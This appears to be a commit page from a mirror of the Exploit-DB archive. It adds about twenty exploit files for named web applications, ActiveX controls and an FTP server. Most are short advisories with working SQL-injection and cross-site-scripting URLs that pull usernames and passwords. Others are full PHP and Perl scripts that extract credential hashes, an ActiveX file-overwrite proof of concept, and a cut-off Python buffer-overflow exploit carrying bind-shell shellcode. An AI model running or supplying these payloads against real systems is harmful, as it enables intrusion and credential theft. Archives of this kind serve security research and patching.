bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 02_25_2014

Browse source
This commit is contained in:
Offensive Security 2014-02-25 04:28:01 +00:00
parent 057e79d117
commit 766b4dbe14
28 changed files with 634 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

27
files.csv
View file

@ -28579,6 +28579,7 @@ id,file,description,date,author,platform,type,port
31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 'AccesCodeStart.asp' Cross-Site Scripting Vulnerability",2008-05-13,"Brad Antoniewicz",asp,webapps,0
31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal 'linking.page.php' SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0
31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit",2014-02-20,"Julien Ahrens",windows,remote,0
31789,platforms/windows/remote/31789.py,"PCMAN FTP 2.07 - Buffer Overflow Exploit",2014-02-20,Sumit,windows,remote,21
31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0
31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 ""CATV5_Backbone_Bus"" - Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
31792,platforms/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80
@ -28634,3 +28635,29 @@ id,file,description,date,author,platform,type,port
31843,platforms/asp/webapps/31843.txt,"Excuse Online 'pwd.asp' SQL Injection Vulnerability",2008-05-26,Unohope,asp,webapps,0
31844,platforms/php/webapps/31844.txt,"phpFix 2.0 fix/browse.php kind Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
31845,platforms/php/webapps/31845.txt,"phpFix 2.0 auth/00_pass.php account Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 HomepageTop.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 HomepageMain.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 MessageReply.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0
31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 class/ApplyDB.php Unrestricted File Upload Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0
31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 post3/Book.asp review Parameter XSS",2008-05-26,Unohope,asp,webapps,0
31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0
31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 'sentout.asp' Unauthorized Access Vulnerability",2008-05-26,Unohope,asp,webapps,0
31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 'news.php' Cross-Site Scripting Vulnerability",2008-05-27,ZoRLu,php,webapps,0
31856,platforms/windows/dos/31856.html,"CA Internet Security Suite 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2008-05-28,Nine:Situations:Group,windows,dos,0
31857,platforms/php/webapps/31857.txt,"Joomla! and Mambo Artists Component 'idgalery' Parameter SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0
31858,platforms/php/webapps/31858.txt,"Calcium 3.10/4.0.4 'Calcium40.pl' Cross Site Scripting Vulnerability",2008-05-28,"Marvin Simkin",php,webapps,0
31859,platforms/asp/webapps/31859.txt,"JustPORTAL 1.0 'site' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0
31860,platforms/asp/webapps/31860.txt,"Proje ASP Portal 2.0 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0
31861,platforms/asp/webapps/31861.txt,"dvbbs 8.2 'login.asp' Multiple SQL Injection Vulnerabilities",2008-05-29,hackerbinhphuoc,asp,webapps,0
31862,platforms/hardware/remote/31862.txt,"Xerox DocuShare 6 dsdn/dsweb/SearchResults URI XSS",2008-05-29,Doz,hardware,remote,0
31863,platforms/hardware/remote/31863.txt,"Xerox DocuShare 6 dsdn/dsweb/Services/User URI XSS",2008-05-29,Doz,hardware,remote,0
31864,platforms/hardware/remote/31864.txt,"Xerox DocuShare 6 docushare/dsweb/ServicesLib/Group URI XSS",2008-05-29,Doz,hardware,remote,0
31865,platforms/asp/webapps/31865.txt,"DotNetNuke 4.8.3 'Default.aspx' Cross-Site Scripting Vulnerability",2008-05-30,"AmnPardaz Security Research Team",asp,webapps,0
31866,platforms/php/webapps/31866.txt,"TorrentTrader Classic 1.x 'scrape.php' SQL Injection Vulnerability",2008-05-31,"Charles Vaughn",php,webapps,0
31867,platforms/php/webapps/31867.php,"CMS Easyway 'mid' Parameter SQL Injection Vulnerability",2008-05-30,Lidloses_Auge,php,webapps,0
31868,platforms/php/webapps/31868.txt,"OtomiGenX 2.2 'userAccount' Parameter SQL Injection Vulnerability",2008-06-02,hadihadi,php,webapps,0
31869,platforms/asp/webapps/31869.txt,"i-pos Storefront 1.3 'index.asp' SQL Injection Vulnerability",2008-06-02,KnocKout,asp,webapps,0
31870,platforms/php/webapps/31870.pl,"Joomla! and Mambo Joo!BB 0.5.9 Component 'forum' Parameter SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0
31871,platforms/asp/webapps/31871.txt,"Te Ecard 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0

Can't render this file because it is too large.

9
platforms/asp/webapps/31850.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29375/info
Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected.
http://www.example.com/post3/Book.asp?review=<script>alert(/xss/)</script>

9
platforms/asp/webapps/31851.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29375/info
Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected.
http://www.example.com/post3/view.asp?id=-99)+union+select+0,uid,password,3,4,5,6,7,8,9,10+from+user+where+1=(1

10
platforms/asp/webapps/31852.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29375/info
Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected.
http://www.example.com/post3/book.asp?review=-99&#039;)+union+select+0,password,uid,3,4,5,6,7,8,9,10+from+user+where+1=1+union+select+*+From+&#20844;&#20296;&#27396
;+Where+&#039;%&#039;=(&#039;

9
platforms/asp/webapps/31854.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29376/info
The Campus Request Repairs System is prone to an unauthorized-access vulnerability because it fails to adequately limit access to administrative scripts used for creating accounts.
An attacker can exploit this vulnerability to gain unauthorized administrative access to the application; other attacks are also possible.
The Campus Request Repairs System 1.2 is vulnerable; other versions may also be vulnerable.
<form action="http://www.example.com/repair/pwd/sentout.asp" method="post"> user: <input type="text" name="pID" value="adm2"><br> pass: <input type="text" name="Pwd" value="123456"> <input type="hidden" name="pFrom" value="N/A"> <input type="hidden" name="pName" value="N/A"> <input type="hidden" name="pTag" value="z,repair,leader"> <input type="submit" value="add"> </form>

12
platforms/asp/webapps/31859.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29426/info
JustPORTAL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
JustPORTAL 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/lab/JustPORTALv1.0/panel/videogit.asp?site=1+union+select+0,(sifre),kullaniciadi,3,4,5+from+uyeler
http://www.example.com/lab/JustPORTALv1.0/panel/resimgit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler
http://www.example.com/lab/JustPORTALv1.0/panel/menugit.asp?site=1+union+select+0,sifre,kullaniciadi+from+uyeler
http://www.example.com/lab/JustPORTALv1.0/panel/habergit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler

27
platforms/asp/webapps/31860.txt Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/29427/info
Proje ASP Portal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Proje ASP Portal 2.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/portal/yonetici/sayfalar.asp?islem=menuduzenle&id=3+union+select+0,kadi,sifre,3,4,5,6+from+uyeler
http://www.example.com/portal/yonetici/bloklar.asp?islem=bloklar&id=1+union+select+0,sifre,kadi,null,4,5+from+uyeler
http://www.example.com/portal/yonetici/chat.asp?islem=chat&id=1+union+select+0,sifre+from+uyeler
http://www.example.com/portal/yonetici/dostsiteler.asp?islem=dost&id=8+union+select+0,kadi,2,sifre+from+uyeler
http://www.example.com/portal/yonetici/dosya.asp?islem=dosyakategorisiduzenle&id=1+union+select+0,sifre,2,3+from+uyeler
http://www.example.com/portal/yonetici/dosya.asp?islem=dosyakategorisiduzenle&id=1+union+select+0,kadi,2,3+from+uyeler
http://www.example.com/portal/yonetici/haber.asp?islem=haber&id=1+union+select+0,1,2,kadi,sifre,5,6,7,8,9+from+uyeler
http://www.example.com/portal/yonetici/ilan.asp?islem=ilankategorisiduzenle&id=1+union+select+0,sifre,2,3+from+uyeler
http://www.example.com/portal/yonetici/oyun.asp?islem=oyunkategorisiduzenle&id=1+union+select+0,kadi+from+uyeler
http://www.example.com/portal/yonetici/oyun.asp?islem=oyunkategorisiduzenle&id=1+union+select+0,sifre+from+uyeler
http://www.example.com/portal/yonetici/resim.asp?islem=resimkategorisiduzenle&id=1+union+select+0,sifre+from+uyeler
http://www.example.com/portal/yonetici/resim.asp?islem=resimkategorisiduzenle&id=1+union+select+0,kadi+from+uyeler
http://www.example.com/portal/yonetici/toplist.asp?islem=toplistkategoriduzenle&id=1+union+select+0,sifre+from+uyeler
http://www.example.com/portal/yonetici/toplist.asp?islem=toplistkategoriduzenle&id=1+union+select+0,kadi+from+uyeler
http://www.example.com/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,sifre+from+uyeler
http://www.example.com/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,kadi+from+uyeler
http://www.example.com/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,sifre,2,3+from+uyeler
http://www.example.com/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,kadi,2,3+from+uyeler
http://www.example.com/portal/yonetici/uyeler.asp?islem=uyebilgi&id=1+union+select+0,1,2,3,4,sifre,kadi,7,8,1,1,1,1,1,1,9,1,0,1,1,1,1,1,1+from+uyeler

12
platforms/asp/webapps/31861.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/29429/info
The 'dvbbs' program is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect dvbbs 8.2; other versions may also be affected.
http:///www.example.com/?password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253
D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25

9
platforms/asp/webapps/31865.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29437/info
DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
DotNetNuke 4.8.3 is vulnerable; other versions may also be affected.
http://www.example.com/Default.aspx/"onmouseover="x='al';x=x+'ert(/Soroush Dalili From WWW.BugReport.IR/)';eval(x);alert().aspx http://www.example.com/Default.aspx/bugreport/"onmouseover="var a='.aspx?';document.location='http://www.bugreport.ir/?archive';

9
platforms/asp/webapps/31869.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29471/info
i-pos Storefront is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
i-pos Storefront 1.3 Beta is vulnerable; other versions may also be affected.
http://www.example.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings

13
platforms/asp/webapps/31871.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/29478/info
Te Ecard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/victim/lab/tecard/admin/pul.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor
http://www.example.com/victim/lab/tecard/admin/pul.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor
http://www.example.com/tecard/admin/card.asp?gorev=duzenle&id=99999+union+select+0x31,null,2,3,sifre,5,6,kullanici_adi,5,0+from+editor+where+id=1
http://www.example.com/lab/tecard/admin/midi.asp?gorev=duzenle&id=1+union+select+0,1,kullanici_adi,3,4,sifre+from+editor
http://www.example.com/lab/tecard/admin/cat.asp?gorev=duzenle&id=1+union+select+kullanici_adi,1,sifre,3,4,5+from+editor
http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor
http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor

9
platforms/hardware/remote/31862.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29430/info
Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Xerox DocuShare 6 and prior versions are vulnerable.
http://www.example.com/dsdn/dsweb/SearchResults/XSS

9
platforms/hardware/remote/31863.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29430/info
Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Xerox DocuShare 6 and prior versions are vulnerable.
http://www.example.com/dsdn/dsweb/Services/User-XSS

9
platforms/hardware/remote/31864.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29430/info
Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Xerox DocuShare 6 and prior versions are vulnerable.
http://www.example.com/docushare/dsweb/ServicesLib/Group-#/XSS

9
platforms/php/webapps/31846.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29372/info
ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability.
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable.
http://www.example.com/class/HomepageTop.php?teacher_id=-99'+union+select+0,1,teacher_password,teacher_account,4,5+from+teacher/*

9
platforms/php/webapps/31847.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29372/info
ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability.
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable.
http://www.example.com/class/HomepageMain.php?teacher_id=-99'+union+select+0,teacher_account,2,3,4,5,6,7,teacher_password+from+teacher/*

9
platforms/php/webapps/31848.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29372/info
ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability.
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable.
http://www.example.com/class/MessageReply.php?teacher_id=1&message_id=-99'+union+select+teacher_account,teacher_password,3,4+from+teacher/*

14
platforms/php/webapps/31849.html Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/29372/info
ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability.
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable.
<form enctype="multipart/form-data" action="http://www.example.com/class/ApplyDB.php" method="post">
<input type="hidden" name="teacher_account" value="blah1">
<input type="hidden" name="teacher_password" value="blah1">
<input type="file" name="uploadfile" size="40"><br>
<input type="submit" value="send">
</form>

9
platforms/php/webapps/31855.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29388/info
Tr Script News is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Tr Script News 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/news/news.php?mode=voir&nb=[XSS]

9
platforms/php/webapps/31857.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29407/info
The Artists component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/*

9
platforms/php/webapps/31858.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29411/info
Calcium is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Calcium 4.0.4 and 3.10 are vulnerable; other versions may also be affected.
http://www.example.com/cgi-bin/Calcium40.pl?Op=ShowIt&CalendarName=[xss]

7
platforms/php/webapps/31866.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/29451/info
TorrentTrader Classic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/scrape.php?info_hash=%22union%20select%201,1,1,1,ip%20from%20users--%20%20%20

61
platforms/php/webapps/31867.php Executable file
View file

@ -0,0 +1,61 @@
source: http://www.securityfocus.com/bid/29461/info
CMS Easyway is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
# EasyWay CMS - SQL Injection Exploit
#
# Vulnerability discovered by: Lidloses_Auge
# Exploit coded by: Lidloses_Auge
# Greetz to: -=Player=- , Suicide, g4ms3, enco,
# GPM, Free-Hack
# Date: 30.05.2008
# Developer: http://www.ta-edv.de/index.php?lg=de&css=1&mid=320&art=1
#
###############################################################
#
# Dork: inurl:"index.php?css=mid=art="
# Admin Panel: [Target]/cms/
# Usage: php '.$argv[0].' [Target] [Userid]
# Example for "http://www.site.com/index.php?css=1&mid=100&art=1"
# => php '.$argv[0].' http://www.site.com 1
#
###############################################################
');
if ($argc == 3) {
echo "\nExploiting in progress:";
$url = $argv[1];
$source = file_get_contents($url.'/index.php?mid=null+order+by+100/*');
$errorcount = substr_count($source,'not a valid MySQL');
$sql = '/index.php?mid=null+union+select+';
for ($i = 25; $i>=1; $i--) {
$source = file_get_contents($url.'/index.php?mid=null+order+by+'.$i.'/*');
if (substr_count($source,'not a valid MySQL')!=$errorcount) {
$errorcount2 = $i;
$i = 1;
}
}
for ($j=1; $j<$errorcount2; $j++) {
$sql = $sql.'concat(0x3a3a3a3a3a,login,0x3a3a313a3a,passwort,0x3a3a323a3a),';
}
$sql = $sql.'concat(0x3a3a3a3a3a,login,0x3a3a313a3a,passwort,0x3a3a323a3a)+from+cms_benutzer+where+id='.$argv[2].'/*';
$source = file_get_contents($url.$sql);
echo "\n";
if (strpos($source,'::::')!=0) {
echo 'User: '.substr($source,strpos($source,'::::')+5,strpos($source,'::1::')-strpos($source,'::::')-5)."\n";
echo 'Hash: '.substr($source,strpos($source,'::1::')+5,strpos($source,'::2::')-strpos($source,'::1::')-5)."\n";
} else {
echo 'Exploit failed!'."\n";
}
} else {
echo "\nNot enough arguments!\n";
}
?>

13
platforms/php/webapps/31868.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/29470/info
OtomiGenX is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OtomiGenX 2.2 is affected by this issue; other versions may also be vulnerable.
The following example POST parameters are available to demonstrate this issue:
userAccount: admin ' or 1=1/*
userPassword: <anything>
userType: Staff

137
platforms/php/webapps/31870.pl Executable file
View file

@ -0,0 +1,137 @@
source: http://www.securityfocus.com/bid/29475/info
The Joo!BB component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Joo!BB 0.5.9 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print "
\n";
print "
#############################################################\n";
print " # Joomla Component Joo!BB Blind SQL Injection Exploit
#\n";
print " # Author:His0k4 [ALGERIAN HaCkeR]
#\n";
print " #
#\n";
print " # Conctact: His0k4.hlm[at]gamil.com
#\n";
print " # Greetz: All friends & muslims HacKeRs
#\n";
print " # Greetz2: http://www.palcastle.org/cc :)
#\n";
print " #
#\n";
print " # Usage: perl jobb.pl host path <options>
#\n";
print " # Example: perl jobb.pl www.host.com /joomla/ -f 1
#\n";
print " #
#\n";
print " # Options:
#\n";
print " # -f Forum id
#\n";
print " # Note:
#\n";
print " # If you need to change the match value so do it :D
#\n";
print "
#############################################################\n";
exit;
}
my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = 1;
my $fid = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "f=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
$userid = $options{"u"};
}
if($options{"f"})
{
$fid = $options{"f"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $path, $userid, $fid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $path, $userid, $fid, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h++;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $path = shift;
my $uid = shift;
my $fid = shift;
my $i = shift;
my $h = shift;
my $ua = LWP::UserAgent->new;
my $query =
"http://".$host.$path."index.php?option=com_joobb&view=forum&forum=".$fid."
and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1
),".$i.",1))=CHAR(".$h.")";
if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
}
my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "Announcements";
if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}

26
platforms/windows/dos/31856.html Executable file
View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/29406/info
A Computer Associates Internet Security Suite ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content. The issue occurs because the control fails to sanitize user-supplied input.
Successful exploits will compromise affected computers and will aid in further attacks.
Internet Security Suite 2008 is vulnerable; other versions may also be affected.
<!--
CA Internet Security Suite 2008 (UmxEventCli.dll/SaveToFile())
remote file corruption poc
by Nine:Situations:Group::surfista
this control is safe for scripting
and safe for initialize
original one: http://retrogod.altervista.org/9sg_CA_poc.html
-->
&lt;html&gt;&lt;object classid=&#039;clsid:F13D3742-6C4F-4915-BF91-784BA02DD0BE&#039;
id=&#039;UmxEventCliLib&#039;/&gt;
&lt;/object&gt;&lt;script language=&#039;vbscript&#039;&gt;
filePath=&quot;..\..\..\..\..\..\..\boot.ini&quot;
UmxEventCliLib.SaveToFile filePath
&lt;/script&gt;&lt;/html&gt;

66
platforms/windows/remote/31789.py Executable file
View file

@ -0,0 +1,66 @@
# Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow (unauthenticated)
# Date: Feb 19, 2014
# Exploit Author: Sumit
# Version: 2.07
# Tested on: Windows XP Professional SP3
# Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 2.07 in place of command
#
import socket
import datetime
"""
You have to take into account your IP addr and servers date (if using NAT, check external IP) as buffer starts like the following:
2014/2/20 [00:40] (00320) 127.0.0.100> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
"""
host = '192.168.213.10'
d = str(datetime.datetime.today()).split()[0].split('-') # You should ideally consider servers date here
for i in range(len(d)): d[i] = str(int(d[i]))
d = '/'.join(d) # Finally we got the date
# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d'
shellcode = (
"\xda\xdb\xd9\x74\x24\xf4\xbe\xb5\x40\x16\xb6\x5b\x2b\xc9" +
"\xb1\x56\x31\x73\x18\x83\xeb\xfc\x03\x73\xa1\xa2\xe3\x4a" +
"\x21\xab\x0c\xb3\xb1\xcc\x85\x56\x80\xde\xf2\x13\xb0\xee" +
"\x71\x71\x38\x84\xd4\x62\xcb\xe8\xf0\x85\x7c\x46\x27\xab" +
"\x7d\x66\xe7\x67\xbd\xe8\x9b\x75\x91\xca\xa2\xb5\xe4\x0b" +
"\xe2\xa8\x06\x59\xbb\xa7\xb4\x4e\xc8\xfa\x04\x6e\x1e\x71" +
"\x34\x08\x1b\x46\xc0\xa2\x22\x97\x78\xb8\x6d\x0f\xf3\xe6" +
"\x4d\x2e\xd0\xf4\xb2\x79\x5d\xce\x41\x78\xb7\x1e\xa9\x4a" +
"\xf7\xcd\x94\x62\xfa\x0c\xd0\x45\xe4\x7a\x2a\xb6\x99\x7c" +
"\xe9\xc4\x45\x08\xec\x6f\x0e\xaa\xd4\x8e\xc3\x2d\x9e\x9d" +
